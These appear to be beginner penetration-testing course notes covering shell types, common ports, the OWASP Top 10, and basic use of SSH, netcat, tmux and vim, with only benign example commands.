Pentesting Basics

Common Terms

Shell

  • On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.

  • Most Linux systems use a program called Bash (Bourne Again Shell) as a shell program to interact with the operating system.

  • Bash is an enhanced version of sh, the Unix systems' original shell program. Aside from bash there are also other shells, including but not limited to Zsh, Tcsh, Ksh, Fish shell, etc.

  • "Getting a shell" on a box (system). This means that the target host has been exploited, and we have obtained shell-level access (typically bash or sh) and can run commands interactively as if we are sitting logged in to the host.

Types of Shell Connections

Reverse shell

Initiates a connection back to a "listener" on our attack box.

Bind shell

"Binds" to a specific port on the target host and waits for a connection from our attack box.

Web shell

Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command.

  • Each type of shell has its use case, and the same way there are many ways to obtain a shell, the helper program that we use to get a shell can be written in many languages (Python, Perl, Go, Bash, Java, awk, PHP, etc.).

Port

  • A port can be thought of as a window or door on a house (the house being a remote system).

  • Ports are virtual points where network connections begin and end.

  • They are software-based and managed by the host operating system.

  • Ports are associated with a specific process or service and allow computers to differentiate between different traffic types.

  • Each port is assigned a number, and many are standardized across all network-connected devices (though a service can be configured to run on a non-standard port).

  • There are two categories of ports, Transmission Control Protocol (TCP), and User Datagram Protocol (UDP).

  • There are 65,535 TCP ports and 65,535 different UDP ports, each denoted by a number.

TCP

  • TCP is connection-oriented, meaning that a connection between a client and a server must be established before data can be sent.

UDP

  • UDP utilizes a connectionless communication model. There is no "handshake" and therefore introduces a certain amount of unreliability since there is no guarantee of data delivery.

  • UDP is useful when error correction/checking is either not needed or is handled by the application itself.

Common Ports

Port(s)
Protocol

20/21 (TCP)

FTP

22 (TCP)

SSH

23 (TCP)

Telnet

25 (TCP)

SMTP

80 (TCP)

HTTP

161 (TCP/UDP)

SNMP

389 (TCP/UDP)

LDAP

443 (TCP)

SSL/TLS (HTTPS)

445 (TCP)

SMB

3389 (TCP)

RDP

  • It is essential for us, especially as pentesters, to have a firm grasp of many TCP and UDP ports and be able to recognize them from just their number quickly

  • This will come with practice and repetition and eventually become second nature as we attack more boxes, labs, and real-world networks and help us work more efficiently and better prioritize our enumeration efforts and attacks.

Web Servers

  • A web server is an application that runs on the back-end server, which handles all of the HTTP traffic from the client-side browser, routes it to the requests destination pages, and finally responds to the client-side browser.

  • Web servers usually run on TCP ports 80 or 443, and are responsible for connecting end-users to various parts of the web application, in addition to handling their various responses.

  • As web applications tend to be open for public interaction and facing the internet, they may lead to the back-end server being compromised if they suffer from any vulnerabilities.

  • Web applications can provide a vast attack surface, making them a high-value target for attackers and pentesters.

OWASP Top 10

  • We will often hear about/see references to the OWASP Top 10. This is a standardized list of the top 10 web application vulnerabilities maintained by the Open Web Application Security Project (OWASP).

  • This list is considered the top 10 most dangerous vulnerabilities and is not an exhaustive list of all possible web application vulnerabilities.

#
Category
Description

1

Restrictions are not appropriately implemented to prevent users from accessing other users accounts, viewing sensitive data, accessing unauthorized functionality, modifying data, etc.

2

Failures related to cryptography which often leads to sensitive data exposure or system compromise.

3

User-supplied data is not validated, filtered, or sanitized by the application. Some examples of injections are SQL injection, command injection, LDAP injection, etc.

4

These issues happen when the application is not designed with security in mind.

5

Missing appropriate security hardening across any part of the application stack, insecure default configurations, open cloud storage, verbose error messages which disclose too much information.

6

Using components (both client-side and server-side) that are vulnerable, unsupported, or out of date.

7

Authentication-related attacks that target user's identity, authentication, and session management.

8

Software and data integrity failures relate to code and infrastructure that does not protect against integrity violations. An example of this is where an application relies upon plugins, libraries, or modules from untrusted sources, repositories, and content delivery networks (CDNs).

9

This category is to help detect, escalate, and respond to active breaches. Without logging and monitoring, breaches cannot be detected..

10

SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL).

Basic Tools

SSH

  • Secure Shell (SSH) is a network protocol that runs on port 22 by default and provides users such as system administrators a secure way to access a computer remotely.

  • SSH can be configured with password authentication or passwordless using public-key authentication using an SSH public/private key pair.

  • SSH uses a client-server model, connecting a user running an SSH client application such as OpenSSH to an SSH server.

  • Command: ssh <UserName>@<IP Address>

    • Example: ssh Bob@10.10.10.10

NetCat

  • Netcat, ncat, or nc, is an excellent network utility for interacting with TCP/UDP ports.

  • It can be used for many things during a pentest but its primary usage is for connecting to shells.

  • Banner Grapping Command: netcat <IP Address> <Port Number>

    • Example: netcat 10.10.10.10 22

    • The output will be the banner of the port we interacted with, informing us of the service running.

  • Windows alternative to netcat coded in PowerShell called PowerCat.

  • Another similar network utility is socat, which has a few features that netcat does not support, like forwarding ports and connecting to serial devices.

Tmux

  • Terminal multiplexers, like tmux or Screen, are great utilities for expanding a standard Linux terminal's features, like having multiple windows within one terminal and jumping between them.

  • To start using tmux, we type tmux in our terminal.

  • To use tmux command we type Ctrl + B followed by the command

    • For example Ctrl + B then typing C will open a new terminal.

  • Useful commands (Ctrl + B followed by the command):

    • C: opens a new window.

    • \# of the window: move to that window.

    • Shift + %: split horizontally (Left and Right)

    • Shift + ": split vertically (Up and Down)

    • Arrows: Move around split windows.

  • This cheatsheet is a very handy reference.

Vim

  • Vim is a great text editor that can be used for writing code or editing text files on Linux systems.

  • We usually find Vim or Vi installed on compromised Linux systems, so learning how to use it allows us to edit files even on remote systems.

  • Vim also has many other features, like extensions and plugins, which can significantly extend its usage and make for a great code editor.

  • There are 2 modes for vim, read-only and insert mode.

  • Once we open a file, we are in read-only normal mode, which allows us to navigate and read the file.

  • Commands:

    • vim <File Name>: Opens a file.

    • i: Starts insert mode.

    • Esc: Exits insert mode.

    • :: Enters to command mode.

  • Commands (Read-only Mode)

Command
Description

x

Cut character

dw

Cut word

dd

Cut full line

yw

Copy word

yy

Copy full line

p

Paste

  • Commands (Command Mode)

Command
Description

:1

Go to line number 1.

:w

Write the file, save

:q

Quit

:q!

Quit without saving

:wq

Write and quit

  • This cheatsheet is an excellent resource for further unlocking the power of Vim.

Service Scanning

Last updated